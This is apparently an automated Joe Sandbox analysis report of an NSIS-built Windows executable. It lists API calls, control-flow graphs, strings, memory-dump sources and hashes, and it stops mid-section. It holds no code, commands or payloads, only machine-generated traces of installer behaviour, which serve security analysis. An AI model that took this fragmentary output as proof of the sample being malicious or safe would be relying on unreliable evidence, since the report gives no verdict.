5256->5210 5994 402a35 5995 402c1f 17 API calls 5994->5995 5996 402a3b 5995->5996 5997 402a72 5996->5997 5998 40288b 5996->5998 6000 402a4d 5996->6000 5997->5998 5999 40640a 17 API calls 5997->5999 5999->5998 6000->5998 6002 40632f wsprintfW 6000->6002 6002->5998 6003 401735 6004 402c41 17 API calls 6003->6004 6005 40173c SearchPathW 6004->6005 6006 4029e6 6005->6006 6007 401757 6005->6007 6007->6006 6009 4063e8 lstrcpynW 6007->6009 6009->6006 6010 4014b8 6011 4014be 6010->6011 6012 401389 2 API calls 6011->6012 6013 4014c6 6012->6013 6014 401db9 GetDC 6015 402c1f 17 API calls 6014->6015 6016 401dcb GetDeviceCaps MulDiv ReleaseDC 6015->6016 6017 402c1f 17 API calls 6016->6017 6018 401dfc 6017->6018 6019 40640a 17 API calls 6018->6019 6020 401e39 CreateFontIndirectW 6019->6020 6021 402592 6020->6021 6022 73f91000 6023 73f9101b 5 API calls 6022->6023 6024 73f91019 6023->6024 6025 40283b 6026 402843 6025->6026 6027 402847 FindNextFileW 6026->6027 6028 402859 6026->6028 6027->6028 6030 4029e6 6028->6030 6031 4063e8 lstrcpynW 6028->6031 6031->6030

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 31 4035d5-4035d9 28->31 32 4035ce-4035d3 28->32 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 31->33 34 4035db-4035df 31->34 32->31 32->32 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 52 4036b2-4036b3 36->52 53 4036b4-4036ba 36->53 41 4035f2-4035fa 37->41 42 40360b-403644 37->42 38->39 58 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->58 54 403814-403824 call 4039e6 OleUninitialize 39->54 55 403769-40376f 39->55 46 403601 41->46 47 4035fc-4035ff 41->47 48 403661-40369b 42->48 49 403646-40364b 42->49 46->42 47->42 47->46 48->36 57 40369d-4036a1 48->57 49->48 56 40364d-403655 49->56 52->53 53->28 59 4036c0 53->59 75 40394a-403950 54->75 76 40382a-40383a call 405a4e ExitProcess 54->76 60 403804-40380b call 403ad8 55->60 61 403775-403780 call 405cea 55->61 63 403657-40365a 56->63 64 40365c 56->64 57->36 65 4036c2-4036d0 call 4063e8 57->65 58->39 58->54 67 4036d5 59->67 74 403810 60->74 77 403782-4037b7 61->77 78 4037ce-4037d8 61->78 63->48 63->64 64->48 65->67 67->29 74->54 80 403952-403968 GetCurrentProcess OpenProcessToken 75->80 81 4039ce-4039d6 75->81 84 4037b9-4037bd 77->84 87 403840-403854 call 4059b9 lstrcatW 78->87 88 4037da-4037e8 call 405dc5 78->88 82 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 80->82 83 40399e-4039ac call 4067c2 80->83 85 4039d8 81->85 86 4039dc-4039e0 ExitProcess 81->86 82->83 101 4039ba-4039c5 ExitWindowsEx 83->101 102 4039ae-4039b8 83->102 91 4037c6-4037ca 84->91 92 4037bf-4037c4 84->92 85->86 99 403861-40387b lstrcatW lstrcmpiW 87->99 100 403856-40385c lstrcatW 87->100 88->54 103 4037ea-403800 call 4063e8 * 2 88->103 91->84 96 4037cc 91->96 92->91 92->96 96->78 99->54 105 40387d-403880 99->105 100->99 101->81 106 4039c7-4039c9 call 40140b 101->106 102->101 102->106 103->60 108 403882-403887 call 40591f 105->108 109 403889 call 40599c 105->109 106->81 117 40388e-40389c SetCurrentDirectoryW 108->117 109->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 129 40393e-403945 call 4061ae 126->129 127->126 128 403907-403927 call 4061ae call 40640a call 4059d1 127->128 128->126 138 403929-403930 CloseHandle 128->138 129->54 138->126
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                              • GetVersion.KERNEL32 ref: 004034CE
                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                              • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                              • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                                • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                              • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\6ZoBPR3isG.exe,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                              • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                              • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\6ZoBPR3isG.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                              • API String ID: 3441113951-650574359
                                                                                                              • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                              • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                              • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                              • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 152 40514f-405156 148->152 155 405080-405087 149->155 156 405073-40507a 149->156 153 404ed9 150->153 154 404edc-404ef9 call 40640a SendMessageW * 2 150->154 151->147 157 404f01-404f2d call 40435f * 2 151->157 159 4051c7-4051cf 152->159 160 405158-40515e 152->160 153->154 154->151 162 405089-40508c 155->162 163 4050fc-4050ff 155->163 156->152 156->155 195 404f33-404f39 157->195 196 404ff8-40500b GetWindowLongW SetWindowLongW 157->196 168 4051d1-4051d7 SendMessageW 159->168 169 4051d9-4051e0 159->169 165 405164-40516e 160->165 166 4053af-4053c1 call 4043c6 160->166 171 405097-4050ac call 404d1a 162->171 172 40508e-405095 162->172 163->152 167 405101-40510b 163->167 165->166 175 405174-405183 SendMessageW 165->175 177 40511b-405125 167->177 178 40510d-405119 SendMessageW 167->178 168->169 179 4051e2-4051e9 169->179 180 405214-40521b 169->180 171->163 194 4050ae-4050bf 171->194 172->163 172->171 175->166 187 405189-40519a SendMessageW 175->187 177->152 189 405127-405131 177->189 178->177 181 4051f2-4051f9 179->181 182 4051eb-4051ec ImageList_Destroy 179->182 185 405371-405378 180->185 186 405221-40522d call 4011ef 180->186 192 405202-40520e 181->192 193 4051fb-4051fc GlobalFree 181->193 182->181 185->166 200 40537a-405381 185->200 211 40523d-405240 186->211 212 40522f-405232 186->212 198 4051a4-4051a6 187->198 199 40519c-4051a2 187->199 190 405142-40514c 189->190 191 405133-405140 189->191 190->152 191->152 192->180 193->192 194->163 201 4050c1-4050c3 194->201 202 404f3c-404f43 195->202 206 405011-405015 196->206 204 4051a7-4051c0 call 401299 SendMessageW 198->204 199->198 199->204 200->166 205 405383-4053ad ShowWindow GetDlgItem ShowWindow 200->205 207 4050c5-4050cc 201->207 208 4050d6 201->208 209 404fd9-404fec 202->209 210 404f49-404f71 202->210 204->159 205->166 214 405017-40502a ShowWindow call 404394 206->214 215 40502f-405037 call 404394 206->215 218 4050d2-4050d4 207->218 219 4050ce-4050d0 207->219 222 4050d9-4050f5 call 40117d 208->222 209->202 226 404ff2-404ff6 209->226 220 404f73-404fa9 SendMessageW 210->220 221 404fab-404fad 210->221 227 405281-4052a5 call 4011ef 211->227 228 405242-40525b call 4012e2 call 401299 211->228 223 405234 212->223 224 405235-405238 call 404d9a 212->224 214->166 215->140 218->222 219->222 220->209 232 404fc0-404fd6 SendMessageW 221->232 233 404faf-404fbe SendMessageW 221->233 222->163 223->224 224->211 226->196 226->206 241 405347-40535b InvalidateRect 227->241 242 4052ab 227->242 246 40526b-40527a SendMessageW 228->246 247 40525d-405263 228->247 232->209 233->209 241->185 244 40535d-40536c call 404ced call 404cd5 241->244 245 4052ae-4052b9 242->245 244->185 248 4052bb-4052ca 245->248 249 40532f-405341 245->249 246->227 251 405265 247->251 252 405266-405269 247->252 254 4052cc-4052d9 248->254 255 4052dd-4052e0 248->255 249->241 249->245 251->252 252->246 252->247 254->255 256 4052e2-4052e5 255->256 257 4052e7-4052f0 255->257 260 4052f5-40532d SendMessageW * 2 256->260 259 4052f2 257->259 257->260 259->260 260->249
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                              • InvalidateRect.USER32(?,00000000,?), ref: 0040534D
                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                              • String ID: $M$N
                                                                                                              • API String ID: 1638840714-813528018
                                                                                                              • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                              • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                              • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                              • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 574 405afa-405b20 call 405dc5 577 405b22-405b34 DeleteFileW 574->577 578 405b39-405b40 574->578 581 405cb6-405cba 577->581 579 405b42-405b44 578->579 580 405b53-405b63 call 4063e8 578->580 582 405c64-405c69 579->582 583 405b4a-405b4d 579->583 587 405b72-405b73 call 405d09 580->587 588 405b65-405b70 lstrcatW 580->588 582->581 586 405c6b-405c6e 582->586 583->580 583->582 589 405c70-405c76 586->589 590 405c78-405c80 call 40672b 586->590 591 405b78-405b7c 587->591 588->591 589->581 590->581 598 405c82-405c96 call 405cbd call 405ab2 590->598 594 405b88-405b8e lstrcatW 591->594 595 405b7e-405b86 591->595 597 405b93-405baf lstrlenW FindFirstFileW 594->597 595->594 595->597 599 405bb5-405bbd 597->599 600 405c59-405c5d 597->600 614 405c98-405c9b 598->614 615 405cae-405cb1 call 405450 598->615 603 405bdd-405bf1 call 4063e8 599->603 604 405bbf-405bc7 599->604 600->582 602 405c5f 600->602 602->582 616 405bf3-405bfb 603->616 617 405c08-405c13 call 405ab2 603->617 608 405bc9-405bd1 604->608 609 405c3c-405c4c FindNextFileW 604->609 608->603 613 405bd3-405bdb 608->613 609->599 612 405c52-405c53 FindClose 609->612 612->600 613->603 613->609 614->589 618 405c9d-405cac call 405450 call 4061ae 614->618 615->581 616->609 619 405bfd-405c06 call 405afa 616->619 627 405c34-405c37 call 405450 617->627 628 405c15-405c18 617->628 618->581 619->609 627->609 631 405c1a-405c2a call 405450 call 4061ae 628->631 632 405c2c-405c32 628->632 631->609 632->609
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405B23
                                                                                                              • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405B6B
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405B8E
                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405B94
                                                                                                              • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405BA4
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                              • API String ID: 2035342205-3035347311
                                                                                                              • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                              • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                              • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                              • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76133180,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76133180), ref: 00406736
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID: xgB
                                                                                                              • API String ID: 2295610775-399326502
                                                                                                              • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                              • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                              • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$EnableShow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1136574915-0
                                                                                                              • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                              • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                              • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                              • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E

                                                                                                              Control-flow Graph

                                                                                                              • Executed
